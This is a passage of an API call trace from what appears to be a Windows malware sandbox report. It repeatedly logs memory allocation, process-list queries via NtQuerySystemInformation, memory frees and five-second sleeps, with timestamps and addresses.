BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0184.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0184.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.545] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0184.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0184.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.671] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0184.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.122] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.286] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.421] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.603] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.747] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0185.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.937] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0185.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0186.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.051] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0186.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0186.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.281] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0186.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.942] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.228] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.365] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.516] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.647] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.789] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0187.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.924] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.070] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.178] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.293] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.427] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, 